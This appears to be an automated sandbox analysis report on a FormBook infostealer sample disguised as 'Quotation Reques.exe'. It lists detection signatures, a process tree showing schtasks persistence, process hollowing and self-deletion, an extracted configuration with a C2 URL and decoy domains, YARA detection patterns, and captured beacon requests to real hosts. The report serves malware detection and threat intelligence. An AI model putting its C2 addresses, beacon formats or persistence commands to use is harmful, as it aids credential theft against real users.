Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Quotation Reques.exe

Overview

General Information

Sample Name:Quotation Reques.exe
Analysis ID:356530
MD5:5a752fcd71acb65c618a829610b7b7e1
SHA1:1e0608c292a70e30f75308255d6039a8ca373d8a
SHA256:d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation Reques.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: 5A752FCD71ACB65C618A829610B7B7E1)
    • schtasks.exe (PID: 6744 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Quotation Reques.exe (PID: 6788 cmdline: C:\Users\user\Desktop\Quotation Reques.exe MD5: 5A752FCD71ACB65C618A829610B7B7E1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.Quotation Reques.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.Quotation Reques.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.Quotation Reques.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        6.2.Quotation Reques.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.Quotation Reques.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quotation Reques.exe' , ParentImage: C:\Users\user\Desktop\Quotation Reques.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', ProcessId: 6744

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exeReversingLabs: Detection: 34%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Quotation Reques.exeVirustotal: Detection: 26%Perma Link
          Source: Quotation Reques.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Quotation Reques.exeJoe Sandbox ML: detected
          Source: 6.2.Quotation Reques.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Quotation Reques.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Quotation Reques.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.valiantbranch.com/0wdn/
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1Host: www.mojavewellnessaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1Host: www.ficuswildlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.thisisauckland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.trainingkanban.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1Host: www.sphenecouture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1Host: www.dorteklarskov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.gurumanindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
          Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox ViewASN Name: KRYSTALGR KRYSTALGR
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1Host: www.mojavewellnessaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1Host: www.ficuswildlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.thisisauckland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.trainingkanban.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1Host: www.sphenecouture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1Host: www.dorteklarskov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.gurumanindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.diabetessurgeryturkey.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:39:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
